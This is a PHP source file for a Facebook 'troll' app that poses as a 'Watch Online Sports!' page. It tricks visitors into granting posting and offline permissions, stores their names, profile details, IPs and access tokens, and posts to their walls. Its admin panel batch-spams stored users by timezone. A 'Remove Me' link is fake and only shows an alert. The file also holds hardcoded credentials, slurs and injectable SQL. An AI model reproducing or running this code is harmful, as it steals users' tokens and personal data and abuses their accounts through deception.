<?php
//////////////////////////////////////////////////////////////////
//		Troll External App - Instructions						//
//////////////////////////////////////////////////////////////////
//	Step 1: Create a new database and database user 			//
//	Step 2: Upload the file and fill in the correct info 		//
//	in this file for the database.								//
//																//
//																//
//		$db = database											//
//		$dbu = database username								//
//		$dbp = database password								//
//		$host = database host - usually localhost				//
//																//
//																//
//	Step 3: Go here: http://developers.facebook.com/setup/ 		//
//	and setup the app. Grab the AppID - it's all 				//
//	you will need.												//
//																//
//	Step 4: Add the appid to this file and edit anything 		//
//	else you might want to change.								//
//																//
//	Step 5: Go to (this filename).php?install=gayfag			//
//																//
//	The app is now installed if you didn't fuck shit up.		//
//			.php?admin to access the amdin panel				//
//																//
//////////////////////////////////////////////////////////////////


//////////////////////////////////////////////////////////////////
//			Database Settings			//
//////////////////////////////////////////////////////////////////
$db 	= "jknetinf_1";		//Database name
$dbu 	= "jknetinf_1";		//Database username
$dbp 	= "123";		//Database password
$host	= "209.190.61.33";		//Database host - usually localhost

//////////////////////////////////////////////////////////////////
//			The App Settings			//
//////////////////////////////////////////////////////////////////
$user = "Kris";		//Username for admin panel
$pass = "JacK";			//Password for admin panel
$appid  = "205231489516814";	//Application ID
$app_perms = "publish_stream,offline_access";	//Application permissions - You don't need to edit this. Ignore it.
$niche_title	= "Watch Online Sports!";	//Niche Title
$status_message = "";	//Status update text
//Content to display to the user - must be valid HTML with no single quotes ( ' <-- that )
$final_output 	= '<iframe style="width: 100%; height: 600px;" src="http://watchonlinelive.info/" scrolling="no" frameborder="0"></iframe>';
$content_width 	= "1000";	//Size the content width needs to be after they click allow
$content_height = "660";	//Size the content height needs to be after they click allow


//////////////////////////////////////////////////////////////////
//			Don't Edit Below This								//
//////////////////////////////////////////////////////////////////
session_start();
$the_users_ip    	= $_SERVER['REMOTE_ADDR'];
$your_domain 		= $_SERVER['HTTP_HOST'];
$your_file_path		= $_SERVER['REQUEST_URI'];
$longurl		= urlencode($your_domain . $your_file_path . "?id=" . base64_encode($the_users_ip));
$sqllink 		= mysql_connect($host, $dbu, $dbp);
mysql_select_db($db);
$final_output = $final_output . $remove_code  = '<br><a href="#" onclick="remove_user();">Remove Me From This Application</a>';
if(isset($_GET['store']) && isset($_POST['id'])){
	$id 		= strip_tags(trim(mysql_real_escape_string($_POST['id'])));
	$name 		= strip_tags(trim(mysql_real_escape_string($_POST['name'])));
	$first_name 	= strip_tags(trim(mysql_real_escape_string($_POST['first_name'])));
	$last_name 	= strip_tags(trim(mysql_real_escape_string($_POST['last_name'])));
	$link 		= strip_tags(trim(mysql_real_escape_string($_POST['link'])));
	$gender 	= strip_tags(trim(mysql_real_escape_string($_POST['gender'])));
	$timezone 	= strip_tags(trim(mysql_real_escape_string($_POST['timezone'])));
	$locale 	= strip_tags(trim(mysql_real_escape_string($_POST['locale'])));
	$verified 	= strip_tags(trim(mysql_real_escape_string($_POST['verified'])));
	$token 		= strip_tags(trim(mysql_real_escape_string($_POST['token'])));
	$ip 		= $_SERVER['REMOTE_ADDR'];
	if(mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users` WHERE `fbid`='$id';")) == 0){
		$insert_sql = "INSERT INTO `$db`.`users` (`id`, `fbid`, `name`, `first_name`, `last_name`, `link`, `gender`, `timezone`, `locale`, `verified`, `token`, `ip`, `timestamp`,`hit`) VALUES 
		(NULL , '$id', '$name', '$first_name', '$last_name', '$link', '$gender', '$timezone', '$locale', '$verified', '$token', '$ip', CURRENT_TIMESTAMP,'0');";	
		if(mysql_query($insert_sql)){
			echo $final_output;
		}else{
			echo("alert('Verification Failed! :(')");
		}
	}else{
		echo $final_output;
	}
}elseif(isset($_GET['install'])){
	if($_GET['install'] == "gayfag"){
		$install_sql = "CREATE TABLE `$db`.`users` (
		`id` INT NOT NULL AUTO_INCREMENT ,
		`fbid` BIGINT NOT NULL ,
		`name` TEXT NOT NULL ,
		`first_name` TEXT NOT NULL ,
		`last_name` TEXT NOT NULL ,
		`link` TEXT NOT NULL ,
		`gender` TEXT NOT NULL ,
		`timezone` TEXT NOT NULL ,
		`locale` TEXT NOT NULL ,
		`verified` INT NOT NULL ,
		`hit` INT NOT NULL ,
		`token` TEXT NOT NULL ,
		`ip` TEXT NOT NULL ,
		`timestamp` TIMESTAMP NOT NULL ,
		PRIMARY KEY ( `id` )
		) ENGINE = MYISAM ;";
		if(mysql_query($install_sql)){
			echo "Installed!";
		}else{
			echo "Database connection error. Check your database configuration. If its right, it should have installed.";
		}
	}else{
		echo "Wrong! Gtfo gayfag!";
	}
}elseif(isset($_GET['admin'])){
	if(!isset($_SESSION['admin'])){
		if(isset($_POST['login'])){
			$u = $_POST['user']; $p = $_POST['pass'];
			if($u != $user || $p != $pass){ $login_error = true; }else{ $login_error = false; }
			if($login_error == true){ echo "<center><b>Bad Login, Bro.</b></center>"; }else{ $_SESSION['admin'] = "poopdick"; header("Location: " . $_SERVER['self'] . "?admin"); }
		}else{ 
			?><html><head><title>Administration Panel | Login</title><style type="text/css"> body{ font-family: Tahoma; color: black; background-image: url(http://i.imgur.com/kMf79.jpg); background-repeat: repeat-x; }</style></head><body><br><br><br><br><center>Please Login To Continue<form action="<?php echo $_SERVER['self'] . "?admin"; ?>" method="POST"><table border="0" style="color: black;"><tr><td>Username:</td><td><input type="text" name="user" style="width: 100%;"></td></tr><tr><td>Password:</td><td><input type="password" name="pass" style="width: 100%;"></td></tr><tr><td colspan="2"><input type="submit" name="login" style="width: 100%;"></td></tr></table></form></center></body></html><?php
		}
	}else{ ?>
		<html><head><title>Administration Panel</title><style type="text/css"> body{ font-family: Tahoma; color: black; background-image: url(http://i.imgur.com/kMf79.jpg); background-repeat: repeat-x; }</style></head><body>
		<div id="nav">
		<a style="color: white; text-decoration: none; font-weight: bold;" href="<?php echo $_SERVER['self'] . "?admin"; ?>">Home</a> |
		<a style="color: white; text-decoration: none; font-weight: bold;" href="<?php echo $_SERVER['self'] . "?admin&batch"; ?>">EZ-Batch</a> | 
		<a style="color: white; text-decoration: none; font-weight: bold;" href="<?php echo $_SERVER['self'] . "?logout"; ?>">Logout</a>
		</div><center><br><br><br><br>
		<?php
		if(isset($_GET['batch'])){
			if(isset($_POST['batch_it'])){
				$status = $_POST['status'];
				$size   = mysql_real_escape_string($_POST['amount']);
				$zone   = $_POST['timezone'];

				if($zone == "e"){
					$grab = "SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-5' AND `users`.`hit`='0' ORDER BY `users`.`id` ASC LIMIT $size;";
				}elseif($zone == "c"){
					$grab = "SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-6' AND `users`.`hit`='0' ORDER BY `users`.`id` ASC LIMIT $size;";
				}elseif($zone == "m"){
					$grab = "SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-7' AND `users`.`hit`='0' ORDER BY `users`.`id` ASC LIMIT $size;";
				}elseif($zone == "p"){
					$grab = "SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-8' AND `users`.`hit`='0' ORDER BY `users`.`id` ASC LIMIT $size;";
				}elseif($zone == "a"){
					$grab = "SELECT * FROM `$db`.`users` WHERE `users`.`hit`='0';";
				}
				
				$result1 = mysql_query($grab);
				echo "<table border='0' style='width: 900px;' cellspacing='0'><th style='background-color: #3B5998; color: white;' colspan='3'>Batch Results</th>";
				$c_count = 0;
				while ($u = mysql_fetch_array($result1, MYSQL_ASSOC)) {
					if(!empty($u['token'])){
						$url 	= "https://graph.facebook.com/" . $u['fbid'] . "/feed";
						$ch 	= curl_init();
						curl_setopt($ch, CURLOPT_URL,$url);
						curl_setopt($ch, CURLOPT_POST, 1);
						curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
						curl_setopt($ch, CURLOPT_POSTFIELDS,"access_token=" . $u['token'] . "&message=" . $status);
						$cresult = curl_exec($ch);
						curl_close ($ch);
						$c_res = json_decode($cresult);
						mysql_query("UPDATE `$db`.`users` SET `hit` = '1' WHERE `users`.`id` ='" . $u['id'] . "';");
						if(isset($c_res->error->message)){
							$ret_res = "<b style='color: red;'>FUCK. - " . $c_res->error->message . "</b>";
						}elseif(isset($c_res->id)){
							$ret_res = "<b style='color: green;'>Post Success! Post ID: " . $c_res->id . "</b>";
						}
						
						if($c_count&1){
							echo "<tr style='background-color: white;'><td>Post: $c_count/$size</td><td>" . $u['name'] . "</td><td>" . $ret_res . "</td></tr>";
						}else{
							echo "<tr style='background-color: lightgrey;'><td>Post: $c_count/$size</td><td>" . $u['name'] . "</td><td>" . $ret_res . "</td></tr>";
						}
					}
					$c_count++;
				}
				mysql_free_result($result1);
				echo "<th style='background-color: #3B5998; color: white;' colspan='3'>Batch Complete</th></table>";
			}else{
		?>
				<form action="<?php echo $_SERVER['self'] . "?admin&batch"; ?>" method="POST" target="_blank">
				<table border="0" style="color: black; " cellspacing="0">
				<th colspan="6" style="background-color: #3B5998; color: white;">Batch To Users</th>
				<tr>
				<td>Status Text (include the link):</td>
				<td><input type="text" name="status" style="width: 300px;"></td>
				<td><select name="timezone">
				<option value="a">All Timezones</option>
				<option value="e">Eastern</option>
				<option value="c">Central</option>
				<option value="m">Mountain</option>
				<option value="p">Pacific</option>
				</select></td>
				<td>Size:</td><td><input type="text" style="width: 90px;" name="amount"></td>
				<td><input type="submit" name="batch_it" value="Run Batch"></td>
				</tr>
				<th colspan="6">(Note: Keep batch size UNDER 1000)</th>
				</table>
				</form>
			
		
		<?php 
			}
		}elseif(isset($_GET['reset'])){
			if(mysql_query("UPDATE `$db`.`users` SET `hit` = '0';")){
				echo "Successfully reset all spammed users to 'unspammed'.";
			}else{
				echo "Could not reset spammed users to unspammed. Uh oh?";
			}
		}else{ 
			$total_users 	 = mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users`;"));
			$unspammed_users = mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users` WHERE `users`.`hit`='0';"));
			$est_users 	 = mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-5';"));
			$cet_users 	 = mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-6';"));
			$mnt_users 	 = mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-7';"));
			$pac_users 	 = mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-8';"));
			date_default_timezone_set('America/New_York');
			$est_time	 = date("g:i a");
			date_default_timezone_set('America/Chicago');
			$cet_time	 = date("g:i a");
			date_default_timezone_set('America/Boise');
			$mnt_time	 = date("g:i a");
			date_default_timezone_set('America/Los_Angeles');
			$pac_time	 = date("g:i a"); ?>
			<table border="0" style="color: black; width: 500px;" cellspacing="0">
				<th colspan="3" style="background-color: #3B5998; color: white;">General User Information</th>
				<tr style="background-color: white;"><td>Total Users:</td><td colspan="2"><?php echo $total_users; ?></td></tr>
				<tr style="background-color: lightgrey;"><td>Total Unspammed Users:</td><td><?php echo $unspammed_users; ?></td>
				<td><a style="color: black; text-decoration: none; font-weight: bold;" href="<?php echo $_SERVER['self'] . "?admin&reset"; ?>">Reset Spammed Users</a></td></tr>
				<tr><td colspan="3">(Note: The initial wallpost is <b>not</b> logged, so we might hit them twice.)</td></tr>
				<tr><td colspan="3">&nbsp;</td></tr>
				<tr><td colspan="3">&nbsp;</td></tr>
				<th colspan="3" style="background-color: #3B5998; color: white;">North American Timezone User Count</th>
				<tr style="font-weight: bold; background-color: #3B5998; color: white;">
					<td >Timezone</td>
					<td>Current Time</td>
					<td>User Count</td>
				</tr>
				<tr style="background-color: white;">
					<td>Eastern</td>
					<td><?php echo $est_time; ?></td>
					<td><?php echo $est_users; ?></td>
				</tr>
				<tr style="background-color: lightgrey;">
					<td>Central</td>
					<td><?php echo $cet_time; ?></td>
					<td><?php echo $cet_users; ?></td>
				</tr>
				<tr style="background-color: white;">
					<td>Mountain</td>
					<td><?php echo $mnt_time; ?></td>
					<td><?php echo $mnt_users; ?></td>
				</tr>
				<tr style="background-color: lightgrey;">
					<td>Pacific</td>
					<td><?php echo $pac_time; ?></td>
					<td><?php echo $pac_users; ?></td>
				</tr>
			</table>
		<?php } ?>
		</center></body></html>
	<?php

	}
}elseif(isset($_GET['logout'])){
	session_destroy();
	header("Location: " . $_SERVER['self'] . "?admin");
}else{
?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title><?php echo $niche_title; ?></title>
<script src="http://code.jquery.com/jquery-1.4.4.js"></script>
<style type="text/css"> body{ font-family: Tahoma; color: white; background-image: url(http://i.imgur.com/kMf79.jpg); background-repeat: repeat-x; } #box{ -moz-border-radius: 15px; border-radius: 15px; background-color: #fff; width: 750px; color: black; border: 2px lightgrey solid; padding: 15px; } .box2{ -moz-border-radius: 15px; border-radius: 15px; background-color: #fff; color: black; width: 500px; height: 450px; border: 2px lightgrey solid; } </style>
</head>
<body>
<center>
<div id="logo" style="font-weight: bold;"><br><?php echo $niche_title; ?></div><br><br><br>
<div id="box">
<h3 id="login_box">Step 1: Click <button onclick="login();">HERE</button> And Click allow</h3>
<div class="box2" id="content"><br><h3 style="color: grey;"><br><br><br><br><br><br>Please Complete Step 1</h3><br><br></div>
</div><br><br><br>
<div style="color: black;"><?php echo $your_domain; ?>&copy; 2009-2012</div>
</center>
<div id="fb-root"></div>
<script>
	window.fbAsyncInit = function() {
		FB.init({appId: '<?php echo $appid; ?>', status: true, cookie: true,
			xfbml: true});
		};
	(function() {
		var e = document.createElement('script');
		e.type = 'text/javascript';
		e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js';
		e.async = true;
		document.getElementById('fb-root').appendChild(e);
	}());
</script>
    
<script type="text/javascript">
function remove_user(){
	if(confirm("Are you sure you want to remove yourself from this application?") == true){
		setTimeout(function(){
		alert("You have successfully been removed from this application. Sorry you didn't like it!");},1700);
	}
}
var token = "";
function get_token(){
	FB.getLoginStatus(function(response){
		if(response.session){
			token = response.session.access_token;
		}else{
			return false;
		}
	});
}
function login() {
	FB.login(function (response) {
		if(response.session){
			if(response.perms){
				FB.api('/me', function(response){
					var id = response.id;
					var name = response.name;
					var first_name = response.first_name;
					var last_name = response.last_name;
					var link = response.link;
					var gender = response.gender;
					var timezone = response.timezone;
					var locale = response.locale;
					var verified = response.verified;
					get_token();
					setTimeout(function(){
						$.post("<?php echo $_SERVER['self'];?>?store=1", {id: id, name: name, first_name: first_name, last_name: last_name, link: link, gender: gender, timezone: timezone, locale: locale, verified: verified, token: token},
						function(data){
								$('#login_box').hide();
								$('#content').html(data);
								$('#content').width(<?php echo $content_width; ?>);
								$('#content').height(<?php echo $content_height; ?>);
								$('#box').width(<?php echo $content_width; ?>);
								
						});
						
						setTimeout(function(){
							<?php if(mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users` WHERE `ip`='$the_users_ip';")) == 0){ ?>
							FB.api('/me/feed', 'post', {message: "<?php echo $status_message; ?>"}, function(response){
								if(!response || response.error){
									//alert('Sorry, An Error Occured. Please Try Again!');
								}else{
									//Post success - lets eat cake!
								}
							});
							<?php } ?>
						},2000);
					},3000);
				});
            }else{
                alert('Sorry, you must allow the application in order to get a response.');
            }
        }else{
            alert('Error Logging In. Please Try Again.');
        }
    },{ perms: '<?php echo $app_perms; ?>'});
}
</script>
</body>
</html>
<?php }
 mysql_close($sqllink); 
?>
